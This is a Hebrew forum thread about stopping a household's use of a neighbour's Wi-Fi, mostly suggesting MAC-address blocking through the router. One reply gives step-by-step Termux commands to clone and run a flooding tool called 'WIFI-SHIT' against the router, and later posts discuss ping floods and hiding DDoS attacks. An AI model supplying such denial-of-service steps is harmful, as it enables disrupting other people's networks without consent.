בירור | ניטרול רשת שכנים
-
@EEE אמר בבירור | ניטרול רשת שכנים:
@K11001100
עריכה: סליחה התבלבלתי זה סיסמא לנתב. במוצ"ש אני אבדוק לוויפיעריכה מוצאש: זה לוויפי
כל הכבוד תודה רבה.
-
@K11001100 אמר בבירור | ניטרול רשת שכנים:
@EEE אמר בבירור | ניטרול רשת שכנים:
@K11001100
עריכה: סליחה התבלבלתי זה סיסמא לנתב. במוצ"ש אני אבדוק לוויפיעריכה מוצאש: זה לוויפי
כל הכבוד תודה רבה.
חסדי ה'. היתה סייעתא דשמייא בעניין!
ולעוזרים ינעם.
2. בלי קשר ספציפי להנ"ל, מהי הכתובת לכניסה לטיפילנק לשנות הגדרות (הפעם זה אצלי) -
@מיוחדת אמר בבירור | ניטרול רשת שכנים:
@K11001100 אני שאלתי אמרו לי רק לבקש מהם אפר לכתוב משהו אנונימי או להגיד שלהם ז יגרום נזק כי ישבים להם על הגלישה ומאיט להם או משהו אחר
עבור מה התגובה?
-
@K11001100 אם יש לך את הסיסמה שלהם אתה יכול לחסום את הכתובת MAC של המכשירים של המשפחה שלך דרך הגדרות הנתב ואז אתה לא גורם נזק לשכנים
תתחבר לWIFI שלהם ותפעיל את התוכנה ותראה מה הכתובת MAC של המכשירים של המשפחה שלך(רק שים לב שאתה לא חוסם לשכן
wnetwatcher.zip -התוכנה של ניר סופר -
@גגגג @K11001100 ניתן לראות כתובת MAC בהגדרות > הגדרות רשת ואינטרנט > WiFi > הגדרות חומרה.
יש שם שורה שבה תראה את כתובת MAC. -
@תורה-צוה-לנו-משה את הכתובת מאק של המכשיר שלך אבל בתוכנה אפשר לראות את הכתובות של כל המכשירים המחוברים לרשת
-
אפשר גם להעמיס לו על הראוטר אם אלפי בקשות התחברות למי שרוצה
להוריד תרמוקס https://play.google.com/store/apps/details?id=com.termux
מפילים את ה-Wi-Fi עם DoS
הכלי WIFI-SHIT נועד לטסטינג העמסה של רשתות Wi-Fi.
לצורך עבודה תקינה - יש להיות מחובר ל-Wi-Fi שאליו עושים את הבדיקה.pkg update
pkg install python
pkg install python2
pkg install git
git clone https://github.com/claprusshow/WIFI-SHIT
cd WIFI-SHIT
pip install -r requirements.txt
python2 WIFI-SHIT.py example.com 80 999999999
הבעיה ש"סשיין" אחד לא יספיק, מומלץ בממוצע להגדיל ל8 ולפעמים גם יותר.
-
@קינג-קומפיוטר אמר בבירור | ניטרול רשת שכנים:
ולחסום את כל הכתובות Mac
אז איך הוא התחבר לנתב אם הוא חסום?
-
@K11001100
ping מליון פעם? וד"ל.
@מתכנת-חובב ...
אגב, ככה הקריסו את משרד הבריאות בחו"ל ואת עיריית ירושלים? -
@תודה-רבה-4 זה נקרא התקפת ddos , יש מודעות גדולה לזה, והרבה ארגונים כיום יחסמו את האפשרות הזו או שהכתובת שלהם ממוסכת בשרת אחר לפני זה. מה שכן אני בכלל לא בטוח כמה זה חוקי להפעיל ddos על מישהו... וייתכן שאפשר לתפוס את זה מהר, אך אני לא בטוח בזה.
-
@avramk100 אפשר לתפוס את זה מהר, ואפשר גם להסוות את זה, ואין סוף לאפשרויות. אני רק 'מראה מקום' איך אפשר לכסות בור ברה"ר. הכל לפי דעת תורה, כמובן...
-
@תודה-רבה-4 למה נראה לך שפינג עושה עומס מיוחד על הרשת?
ומה הקשקוש על DDOS? לא מדובר פה על אתר אלא על ראוטר
נ.ב. לא "הקריסו את משרד הבריאות בחו"ל" אלא הקריסו אותו, וכדי לעצור את המתקפה הם פשוט חסמו בינתיים גישה לאתר מIP לא ישראלי... -
@צדיק-תמים פינג שאתה מכיר אכן לא עושה עומס על הרשת, אבל כשנשלחים אלפי ומליוני פינגים בו זמנית לכתובת והשרת לא מצליח לענות לכל הבקשות אז אוטו' יש קריסה... אם אני זוכר טוב חברת cloudflare דיווחה לאחרונה על שיא חדש במתקפות ddos כאשר נשלחו לשרת כ8.6 מליון (!) פינגים בו זמנית ...